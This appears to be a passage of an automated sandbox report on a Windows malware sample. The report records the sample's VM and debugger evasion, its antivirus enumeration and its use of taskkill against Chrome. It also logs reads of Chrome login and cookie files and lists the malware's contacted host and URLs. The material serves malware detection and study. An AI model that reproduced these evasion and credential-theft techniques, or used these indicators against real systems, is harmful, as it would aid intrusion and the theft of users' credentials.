Kernel Debug Network Adapter{4d36e972-e325-11ce-bfc1-08002be10318}Standard PS/2 KeyboardKeyboardACPI{4d36e96b-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}Local Print QueuePrintQueueSWDMicrosoft Print to PDF{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}
Source: 56BB1610C0318054.exe, 00000002.00000003.276888845.0000000003126000.00000004.00000001.sdmp Binary or memory string: Microsoft Hyper-V Generation CounterSystemACPI
Source: 56BB1610C0318054.exe, 00000002.00000003.274009815.000000000310D000.00000004.00000001.sdmp Binary or memory string: Motherboard resourcesSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft AC AdapterBatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDSend To OneNote 16{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}VolumeVolumeSTORAGE{71a27cdd-812a-11d0-bec7-08002be2092f}USB Root Hub (USB 3.0)USBUSB{36fc9e60-c465-11cf-8056-444553540000}Generic software deviceSoftwareDeviceSWDMicrosoft RRAS Root Enumerator{62f9c741-b25a-46ce-b54c-9bccce08b6f2}WAN Miniport (PPTP)NetSWDWAN Miniport (PPTP)
Source: ecvD64F.tmp.8.dr Binary or memory string: https://arc.msn.com/v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=314559&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:472DC600-FEAB-E7F8-720D-1E33F00FD1E7&ctry=US&time=20200930T150353Z&lc=en-US&pl=en-US&idtp=mid&uid=4388269c-b420-4134-ac19-bc7ca8a19ac1&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=a3f17ad884a74d7f9591079e57f1f35d&ctmode=MultiSession&arch=x64&cdm=1&cdmver=10.0.17134.1&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.17134.1&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=663704&metered=false&nettype=ethernet&npid=sc-314559&oemName=VMware%2C%20Inc.&oemid=VMware%2C%20Inc.&ossku=Professional&smBiosDm=VMware7%2C1&tl=2&tsu=663704&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing=
Source: 56BB1610C0318054.exe, 00000002.00000003.273800958.0000000003104000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000003.251729735.0000000002C41000.00000004.00000001.sdmp Binary or memory string: Microsoft Hyper-V Generation Counter
Source: 56BB1610C0318054.exe, 00000002.00000003.249685348.0000000002E0D000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000003.252026845.0000000002C6D000.00000004.00000001.sdmp Binary or memory string: Motherboard resourcesSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft AC AdapterBatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDSend To OneNote 16{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}VolumeVolumeSTORAGE{71a27cdd-812a-11d0-bec7-08002be2092f}USB Root Hub (USB 3.0)USBUSB{36fc9e60-c465-11cf-8056-444553540000}Generic software deviceSoftwareDeviceSWDMicrosoft RRAS Root Enumerator{62f9c741-b25a-46ce-b54c-9bccce08b6f2}WAN Miniport (PPTP)NetSWDWAN Miniport (PPTP){4d36e972-e325-11ce-bfc1-08002be10318}High precision event timerSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}WAN Miniport (IKEv2)NetSWDWAN Miniport (IKEv2){4d36e972-e325-11ce-bfc1-08002be10318}Composite Bus EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Virtual Drive EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Storage Spaces ControllerSCSIAdapterROOT{4d36e97b-e325-11ce-bfc1-08002be10318}System CMOS/real time clockSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Kernel Debug Network AdapterNetROOTMicrosoft Kernel Debug Network Adapter{4d36e972-e325-11ce-bfc1-08002be10318}Standard PS/2 KeyboardKeyboardACPI{4d36e96b-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}Local Print QueuePrintQueueSWDMicrosoft Print to PDF{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}
Source: 56BB1610C0318054.exe, 00000002.00000003.274009815.000000000310D000.00000004.00000001.sdmp Binary or memory string: Motherboard resourcesSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft AC AdapterBatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDSend To OneNote 16{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}VolumeVolumeSTORAGE{71a27cdd-812a-11d0-bec7-08002be2092f}USB Root Hub (USB 3.0)USBUSB{36fc9e60-c465-11cf-8056-444553540000}Generic software deviceSoftwareDeviceSWDMicrosoft RRAS Root Enumerator{62f9c741-b25a-46ce-b54c-9bccce08b6f2}
Source: 56BB1610C0318054.exe, 00000004.00000002.260847754.000000000019B000.00000004.00000010.sdmp Binary or memory string: VMware Virtual disk 2.0
Source: 56BB1610C0318054.exe, 00000002.00000003.277295939.00000000030E1000.00000004.00000001.sdmp Binary or memory string: Microsoft Hyper-V Generation CounterHB
Source: 56BB1610C0318054.exe, 00000002.00000003.274286153.0000000003113000.00000004.00000001.sdmp Binary or memory string: Motherboard resourcesSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft AC AdapterBatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDSend To OneNote 16{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}VolumeVolumeSTORAGE{71a27cdd-812a-11d0-bec7-08002be2092f}USB Root Hub (USB 3.0)USBUSB{36fc9e60-c465-11cf-8056-444553540000}Generic software deviceSoftwareDeviceSWDMicrosoft RRAS Root Enumerator{62f9c741-b25a-46ce-b54c-9bccce08b6f2}WAN Miniport (PPTP)NetSWDWAN Miniport (PPTP){4d36e972-e325-11ce-bfc1-08002be10318}High precision event timerSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}WAN Miniport (IKEv2)NetSWDWAN Miniport (IKEv2){4d36e972-e325-11ce-bfc1-08002be10318}Composite Bus EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Virtual Drive EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Storage Spaces ControllerSCSIAdapterROOT{4d36e97b-e325-11ce-bfc1-08002be10318}System CMOS/real time clockSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Kernel Debug Network AdapterNetROOTMicrosoft Kernel Debug Network Adapter{4d36e972-e325-11ce-bfc1-08002be10318}Standard PS/2 KeyboardKeyboardACPI{4d36e96b-e325-11ce-bfc1-08002be10318}k
Source: 56BB1610C0318054.exe, 00000002.00000003.273776372.0000000003107000.00000004.00000001.sdmp Binary or memory string: Motherboard resourcesSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft AC AdapterBatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDSend To OneNote 16{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI
Source: 56BB1610C0318054.exe, 00000004.00000002.260847754.000000000019B000.00000004.00000010.sdmp Binary or memory string: VMware
Source: 56BB1610C0318054.exe, 00000002.00000003.276872790.0000000003100000.00000004.00000001.sdmp Binary or memory string: Microsoft Hyper-V Generation Counterh
Source: C:\Users\user\AppData\Roaming\1611971443428.exe Process information queried: ProcessInformation

Anti Debugging:

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: 0_2_10019FF0 GetCurrentProcess,CheckRemoteDebuggerPresent, 0_2_10019FF0
Hides threads from debuggers
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Thread information set: HideFromDebugger
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Process queried: DebugObjectHandle
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Process queried: DebugFlags
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: 0_2_00403E2C rdtsc 0_2_00403E2C
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 1_2_079BEA04 LdrInitializeThunk, 1_2_079BEA04
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: 0_2_1001A010 IsDebuggerPresent, 0_2_1001A010
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: 0_2_00408D68 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00408D68
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: 0_2_00404E19 mov eax, dword ptr fs:[00000030h] 0_2_00404E19
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: 0_2_10019DE0 mov eax, dword ptr fs:[00000030h] 0_2_10019DE0
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: 0_2_10019E13 mov eax, dword ptr fs:[00000030h] 0_2_10019E13
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: 0_2_10019E13 mov eax, dword ptr fs:[00000030h] 0_2_10019E13
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: 0_2_10019E70 mov eax, dword ptr fs:[00000030h] 0_2_10019E70
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: 0_2_10019E70 mov eax, dword ptr fs:[00000030h] 0_2_10019E70
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: 0_2_10019ED0 mov eax, dword ptr fs:[00000030h] 0_2_10019ED0
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Code function: 2_2_10019DE0 mov eax, dword ptr fs:[00000030h] 2_2_10019DE0
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Code function: 2_2_10019E13 mov eax, dword ptr fs:[00000030h] 2_2_10019E13
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Code function: 2_2_10019E13 mov eax, dword ptr fs:[00000030h] 2_2_10019E13
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Code function: 2_2_10019E70 mov eax, dword ptr fs:[00000030h] 2_2_10019E70
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Code function: 2_2_10019E70 mov eax, dword ptr fs:[00000030h] 2_2_10019E70
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Code function: 2_2_10019ED0 mov eax, dword ptr fs:[00000030h] 2_2_10019ED0
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: 0_2_1000E90E GetProcessHeap,GetProcessHeap,HeapAlloc,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,__heap_term,__RTC_Initialize,GetCommandLineA,___crtGetEnvironmentStringsA,__ioinit,__mtterm,__setargv,__setenvp,__cinit,__ioterm, 0_2_1000E90E
Enables debug privileges
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: 0_2_10015354 SetUnhandledExceptionFilter,__encode_pointer, 0_2_10015354
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: 0_2_10015376 __decode_pointer,SetUnhandledExceptionFilter, 0_2_10015376
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: 0_2_10018413 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,RtlUnwind, 0_2_10018413
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: 0_2_1000E44D _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_1000E44D
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: 0_2_1000EFFC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_1000EFFC
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Code function: 2_2_10015354 SetUnhandledExceptionFilter,__encode_pointer, 2_2_10015354
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Code function: 2_2_10015376 __decode_pointer,SetUnhandledExceptionFilter, 2_2_10015376
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Code function: 2_2_10018413 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,RtlUnwind, 2_2_10018413
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Code function: 2_2_1000E44D _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 2_2_1000E44D
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Code function: 2_2_1000EFFC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 2_2_1000EFFC
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe Code function: 28_2_00F41C57 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 28_2_00F41C57
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe Code function: 28_2_00F4461F SetUnhandledExceptionFilter, 28_2_00F4461F
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe Code function: 28_2_00F4373A _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 28_2_00F4373A
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe Code function: 28_2_00F4631F __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 28_2_00F4631F

HIPS / PFW / Operating System Protection Evasion:

Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im chrome.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Uses taskkill to terminate processes
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im chrome.exe
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: 0_2_1001A0F0 InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateMutexA,GetLastError, 0_2_1001A0F0

Language, Device and Operating System Detection:

Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: 0_2_1001779F cpuid 0_2_1001779F
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: GetLocaleInfoA, 0_2_10017CF0
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Code function: GetLocaleInfoA, 2_2_10017CF0
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe Code function: GetLocaleInfoA, 28_2_00F47189
Queries device information via Setup API
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: 0_2_10019780 SetupDiGetDeviceRegistryPropertyA,GetLastError,_memset,SetupDiGetDeviceRegistryPropertyA, 0_2_10019780
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\SysWOW64\msiexec.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\msiexec.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: 0_2_10015254 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 0_2_10015254
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: 0_2_00401000 GetVersionExA,GetVersionExA,GetVersionExA,GetVersionExA, 0_2_00401000
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings:

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct

Stealing of Sensitive Information:

Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Preferences
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\hihistory
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Behavior Graph ID: 346134 Sample: Cyfj6XGbkd.exe Startdate: 29/01/2021 Architecture: WINDOWS Score: 93

Root-level signatures: Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; Uses ping.exe to sleep; 3 other signatures

Process tree (rebuilt from the behavior graph; each entry lists the process, then its network contacts, dropped files and signatures):

  • Cyfj6XGbkd.exe
      Network: 84cfba021a5a6662.xyz 104.21.23.16, ports 49714, 49715, 49716 (CLOUDFLARENETUS, United States)
      Dropped: C:\Users\user\...\56BB1610C0318054.exe (PE32); C:\...\56BB1610C0318054.exe:Zone.Identifier (ASCII)
      Signatures: Detected unpacking (creates a PE file in dynamic memory); Installs new ROOT certificates; Contains functionality to infect the boot sector; 5 other signatures
      • 56BB1610C0318054.exe
          Network: 84cfba021a5a6662.xyz; 84CFBA021A5A6662.xyz
          Dropped: C:\Users\user\AppData\...\1611971443428.exe (PE32); C:\Users\user\AppData\Local\Temp\xldl.dll (PE32); C:\Users\user\AppData\Local\...\zlib1.dll (PE32); 7 other files (none is malicious)
          Signatures: Multi AV Scanner detection for dropped file; Detected unpacking (creates a PE file in dynamic memory); Machine Learning detection for dropped file; 3 other signatures
          • cmd.exe
              • conhost.exe
              • PING.EXE
          • 1611971443428.exe
          • ThunderFW.exe
      • 56BB1610C0318054.exe
          Network: 84cfba021a5a6662.xyz
          Dropped: C:\Users\user\AppData\...\Secure Preferences (UTF-8); C:\Users\user\AppData\Local\...\Preferences (ASCII)
          Signatures: Tries to harvest and steal browser information (history, passwords, etc)
          • cmd.exe (Uses ping.exe to sleep)
              • PING.EXE (Network: 192.168.2.1)
              • conhost.exe
          • cmd.exe
              • conhost.exe
                  • MpCmdRun.exe
                      • conhost.exe
              • taskkill.exe
      • cmd.exe (Uses ping.exe to sleep; Network: 127.0.0.1)
          • conhost.exe
          • PING.EXE
      • msiexec.exe
          Dropped: C:\Users\user\AppData\Local\...\MSIB2E9.tmp (PE32)
  • msiexec.exe

Contacted Public IPs

IP            Domain   Country        ASN    ASN Name         Malicious
104.21.23.16  unknown  United States  13335  CLOUDFLARENETUS  false

Private

IP
192.168.2.1
127.0.0.1

Contacted Domains

Name IP Active
84CFBA021A5A6662.xyz 104.21.23.16 true
84cfba021a5a6662.xyz 104.21.23.16 true

Contacted URLs

Name                                       Malicious  Antivirus Detection                      Reputation
http://84cfba021a5a6662.xyz/info_old/g     false      1%, Virustotal; Avira URL Cloud: safe    unknown
http://84cfba021a5a6662.xyz/info_old/e     false      1%, Virustotal; Avira URL Cloud: safe    unknown
http://84cfba021a5a6662.xyz/info_old/w     false      Avira URL Cloud: safe                    unknown
http://84cfba021a5a6662.xyz/info_old/r     false      Avira URL Cloud: safe                    unknown
http://84CFBA021A5A6662.xyz/info_old/ddd   false      Avira URL Cloud: safe                    unknown